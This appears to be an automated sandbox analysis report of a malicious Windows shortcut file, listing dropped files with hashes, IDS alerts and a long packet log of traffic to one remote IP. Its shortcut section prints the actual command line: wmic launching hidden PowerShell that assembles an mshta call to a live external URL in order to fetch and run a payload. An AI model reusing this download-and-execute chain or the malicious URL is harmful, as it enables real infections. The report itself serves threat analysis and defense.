                                                                        SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                        MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                        SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                        SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                        SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                        File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):99
                                                                        Entropy (8bit):4.943821049972357
                                                                        Encrypted:false
                                                                        SSDEEP:3:HRAbABGQaFyw3pYoCHyg4E2J5yKXW/Zi+URAAy:HRYF5yjoCHhJ23yKXW/Zzyy
                                                                        MD5:837A8AFA0534369AF64741AFD86F5093
                                                                        SHA1:7569D32D0ADD2EEE25705C4BC101B7898D357370
                                                                        SHA-256:C13B04EFBFBFB63EE7B34BB6DD95A7C433C3A81BB08BCB3DE97334D2146EFB81
                                                                        SHA-512:5A34E5614CD2E6E034FD4F3E5065E4F22E7B5BA7B3EED6A5E693C3291ED6C4717DCCEE898BB98547BE6F09277D1CAD8DDA4C104E318E4D5971D67B63405D9910
                                                                        Malicious:true
                                                                        Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:PDF document, version 1.5, 7 pages (zip deflate encoded)
                                                                        Category:dropped
                                                                        Size (bytes):382562
                                                                        Entropy (8bit):7.568010490995865
                                                                        Encrypted:false
                                                                        SSDEEP:6144:dozIzH/hHHXwI45QTULrCe49nPbJ3V2T8JW:do6/ZAI45QALrCeObJgTF
                                                                        MD5:0863C46694D51D3248DE554D6ECD9442
                                                                        SHA1:AF2E1D8FF367051202D9921726AC303A4D451E07
                                                                        SHA-256:D88D5D6411B8ADAE9A6688B64DE843BD6EAB303724181256EE5FB2F8440D4F3A
                                                                        SHA-512:63FEC7F0FD266903FE43EC5F207A874B78D4427B34911D99C29C5E2CA4CF00DFE3D0D4CCD67B2A9413A26CDF9D80A8C77BCF68E10A7B150F91BC0FF31E8F0859
                                                                        Malicious:false
                                                                        Preview:%PDF-1.5..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 31 0 R/MarkInfo<</Marked true>>>>..endobj..2 0 obj..<</Type/Pages/Count 7/Kids[ 3 0 R 6 0 R 18 0 R 20 0 R 24 0 R 26 0 R 28 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</XObject<</Image5 5 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 540 720] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 126>>..stream..x.m.1..P...................M...dQ..(."....n@.>v.l[.R.].`N.6..BI.x.*..W...5de,...T..#.3.....W.....^....<..n>Mc@...y..i'...endstream..endobj..5 0 obj..<</Type/XObject/Subtype/Image/Width 1554/Height 2199/ColorSpace/DeviceRGB/BitsPerComponent 8/Filter/DCTDecode/Interpolate true/Length 172175>>..stream........JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."..........
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):1083904
                                                                        Entropy (8bit):6.30643452024023
                                                                        Encrypted:false
                                                                        SSDEEP:24576:xrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9TvaI1M:x2EYTb8atv1orq+pEiSDTj1VyvBa6
                                                                        MD5:2A89603D2620B2A62113513709E38E95
                                                                        SHA1:E82753848FBD2E4C993661A80AD11CCA2FA73B77
                                                                        SHA-256:B52B0E15BCDC6B45A70FBF908381B1385B1A84BF6EB2BCFC35CB684B774021F7
                                                                        SHA-512:2AD57BCDE8D647CF8C7DA2FE563ED07F9F51E4D4A61397C459705C95D14AC0F48E95AE49126947BD4A7A8B7FC360A3A336A9BBA41111CEDDA422FAF508773E98
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 35%
                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG....>PG.....PG.....PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(.#PG."(..*PG."(..PG.+PF..RG..9I.{PG..9D.*PG..9..*PG.+P.*PG..9E.*PG.Rich+PG.........................PE..d.....jg.........."......4...R.......T.........@....................................p.....`...@...............@..............................\..|........A...@..Ho..............t...Pp..........................(...pp...............P..8............................text...(3.......4.................. ..`.rdata...B...P...D...8..............@..@.data... ........P...|..............@....pdata..Ho...@...p..................@..@.rsrc....A.......B...<..............@..@.reloc..t............~..............@..B................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):55
                                                                        Entropy (8bit):4.306461250274409
                                                                        Encrypted:false
                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                        Malicious:false
                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                        Process:C:\Windows\System32\wbem\WMIC.exe
                                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                                        Category:dropped
                                                                        Size (bytes):160
                                                                        Entropy (8bit):5.083203110114614
                                                                        Encrypted:false
                                                                        SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgldL/AFJQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/egryeAin
                                                                        MD5:31F81501D06BB9AA0197B769156B9AF4
                                                                        SHA1:7A1358F0D604E53006B61FDAB148C0B94916AF63
                                                                        SHA-256:7F841B32E141480CDD9C57ADD534EE6D7F2754E50DE5A9A2BE027E0B81D5C95F
                                                                        SHA-512:E01B05AB4CB20C58019DD1415CB8A4DBB39C0EC57AC8B833F710A84B2BA543E1E96368519B430392E134C570376CD1A229686F92488FDB50F50668335B4BFB67
                                                                        Malicious:false
                                                                        Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 7832;...ReturnValue = 0;..};....
                                                                        File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                                        Entropy (8bit):2.6406088765710773
                                                                        TrID:
                                                                        • Windows Shortcut (20020/1) 100.00%
                                                                        File name:n5Szx8qsFB.lnk
                                                                        File size:1'920 bytes
                                                                        MD5:a1cfce4d0ce44d183b7c9c5bbce9d8f5
                                                                        SHA1:f5f7d71c40e07bb97f55754f920879f05747754e
                                                                        SHA256:be673f7be053fa7deb72a5e592c48c2acfc2f6f31c5c5aeaaf03602419aa00e9
                                                                        SHA512:fb7e71b6ae59143a72128700b577353ebf6fd627f7f02495975bc072b900b4c6c7770755150509d4ec8929d10b16371dcfe74e81a406aef4ad3cb2c099b1a3ff
                                                                        SSDEEP:24:8AyH/BUlgKN4e9+/38kWNdk6Zoc6w8qdd79dsrabqyI+pu:89uGeK8ldkU6UdJ9Aaey3w
                                                                        TLSH:4C415E082AE90B20F3B7DE72587AB321997F7C49DD728F1C018186892536620F475F6B
                                                                        File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                                                                        Icon Hash:72d282828e8d8dd5

                                                                        General

                                                                        Relative Path:..\..\..\..\..\Windows\System32\Wbem\wmic.exe
                                                                        Command Line Argument:process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')"
                                                                        Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                        2024-12-27T09:05:26.683305+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49711 | 147.45.49.155 | 443 | TCP
                                                                        2024-12-27T09:05:34.077266+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 1 | 192.168.2.8 | 49722 | 147.45.49.155 | 443 | TCP
                                                                        2024-12-27T09:05:34.331279+0100 | 1810003 | Joe Security ANOMALY Windows PowerShell HTTP PE File Download | 2 | 147.45.49.155 | 443 | 192.168.2.8 | 49722 | TCP
                                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                        Dec 27, 2024 09:05:15.519646883 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:15.519682884 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:15.519917965 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:15.590751886 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:15.590775013 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:17.151045084 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:17.151119947 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:17.220261097 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:17.220292091 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:17.220650911 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:17.220700979 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:17.223469019 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:17.271327019 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:17.770606995 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:17.770658970 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:17.971697092 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:17.971712112 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:17.971780062 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:17.971795082 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:17.971823931 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:17.971837997 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:17.971874952 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:18.024584055 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.024605989 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.024657011 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:18.024672985 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.024749994 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:18.024749994 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:18.173094988 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.173120975 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.173171997 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:18.173202038 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.173223019 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:18.173283100 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:18.203048944 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.203068972 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.203140974 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:18.203171015 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.203270912 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:18.233737946 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.233764887 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.233835936 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:18.233864069 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.233908892 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:18.272030115 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.272053003 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.272104979 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:18.272136927 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.272150993 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:18.272186041 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:18.377669096 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.377691984 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.377762079 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:18.377772093 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.377824068 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:18.398593903 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.398612022 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.398668051 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:18.398678064 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.398701906 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:18.398725033 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:18.414202929 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.414223909 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.414273977 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:18.414278984 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.414335012 CET | 49705 | 443 | 192.168.2.8 | 147.45.49.155
                                                                        Dec 27, 2024 09:05:18.425884962 CET | 443 | 49705 | 147.45.49.155 | 192.168.2.8
                                                                        Dec 27, 2024 09:05:18.425904036 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.425966024 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.425976992 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.426012039 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.474349976 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.474379063 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.474428892 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.474436045 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.474469900 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.474490881 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.574937105 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.574966908 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.575037003 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.575046062 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.575081110 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.584474087 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.584508896 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.584542036 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.584547997 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.584604979 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.596694946 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.596719027 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.596767902 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.596775055 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.596791983 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.596816063 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.608175993 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.608194113 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.608272076 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.608279943 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.608323097 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.617101908 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.617117882 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.617163897 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.617171049 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.617202044 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.617223024 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.625484943 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.625513077 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.625560045 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.625566006 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.625597000 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.625617027 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.633224964 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.633253098 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.633296967 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.633302927 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.633352041 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.633374929 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.676337957 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.676369905 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.676418066 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.676436901 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.676461935 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.676476955 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.777838945 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.777868986 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.777944088 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.777945042 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.777971983 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.778028011 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.785377979 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.785406113 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.785482883 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.785502911 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.785525084 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.785732031 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.792036057 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.792061090 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.792125940 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.792143106 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.792156935 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.792181969 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.799619913 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.799649000 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.799699068 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.799710035 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.799741030 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.799758911 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.807167053 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.807182074 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.807250023 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.807264090 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.807301044 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.814364910 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.814373016 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.814426899 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.814441919 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.814455986 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.814503908 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.821981907 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.822014093 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.822053909 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.822061062 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.822091103 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.822112083 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.876987934 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.877083063 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.877085924 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:18.877154112 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.877370119 CET49705443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:18.877383947 CET44349705147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:21.019643068 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:21.019686937 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:21.019782066 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:21.028373957 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:21.028390884 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:22.626708984 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:22.626789093 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:22.628489017 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:22.628496885 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:22.628849030 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:22.635529041 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:22.683327913 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.246561050 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.287381887 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:23.447544098 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.447556019 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.447580099 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.447607994 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.447624922 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:23.447633028 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.447696924 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:23.501672029 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.501702070 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.501748085 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:23.501761913 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.501792908 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:23.501806021 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:23.652462959 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.652487993 CET44349709147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:23.652564049 CET49709443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:23.652573109 CET44349709147.45.49.155192.168.2.8
